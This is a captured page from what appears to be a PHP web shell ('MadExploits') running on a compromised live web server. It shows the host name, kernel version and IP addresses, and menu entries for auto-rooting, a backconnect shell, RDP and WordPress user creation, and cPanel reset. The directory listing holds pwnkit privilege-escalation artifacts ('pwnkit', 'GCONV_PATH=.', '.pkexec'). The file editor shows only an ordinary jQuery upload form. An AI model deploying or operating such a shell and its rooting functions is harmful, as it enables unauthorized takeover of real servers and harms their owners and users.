Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
thearyasamaj /
public_html /
ajax /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
blog
[ DIR ]
drwxr-x---
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
style
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
uploads
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
ReadMe.txt
94
B
-rw-r--r--
index.php
2.42
KB
-rw-r--r--
index1.php
1.11
KB
-rw-r--r--
processupload.php
6.92
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
upload-picture.php
2.09
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Ajax Upload and Resize with jQuery and PHP</title> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js" type="text/javascript"></script> <script type="text/javascript" src="js/jquery.form.js"></script> <script type="text/javascript"> $(document).ready(function() { //elements var progressbox = $('#progressbox'); var progressbar = $('#progressbar'); var statustxt = $('#statustxt'); var submitbutton = $("#SubmitButton"); var myform = $("#UploadForm"); var output = $("#output"); var completed = '0%'; $(myform).ajaxForm({ beforeSend: function() { //brfore sending form submitbutton.attr('disabled', ''); // disable upload button statustxt.empty(); progressbox.show(); //show progressbar progressbar.width(completed); //initial value 0% of progressbar statustxt.html(completed); //set status text statustxt.css('color','#000'); //initial color of status text }, uploadProgress: function(event, position, total, percentComplete) { //on progress progressbar.width(percentComplete + '%') //update progressbar percent complete statustxt.html(percentComplete + '%'); //update status text if(percentComplete>50) { statustxt.css('color','#fff'); //change status text to white after 50% } }, complete: function(response) { // on complete output.html(response.responseText); //update element with received data myform.resetForm(); // reset form submitbutton.removeAttr('disabled'); //enable submit button progressbox.hide(); // hide progressbar } }); }); </script> <link href="style/style.css" rel="stylesheet" type="text/css" /> </head> <body> <form action="processupload.php" method="post" enctype="multipart/form-data" id="UploadForm"> <table width="500" border="0"> <tr> <td>File : </td> <td><input name="ImageFile" type="file" /></td> </tr> <tr> <td> </td> <td><input type="submit" id="SubmitButton" value="Upload" /></td> </tr> </table> </form> <div id="progressbox"><div id="progressbar"></div ><div id="statustxt">0%</div ></div> <div id="output"></div> </body> </html>
Close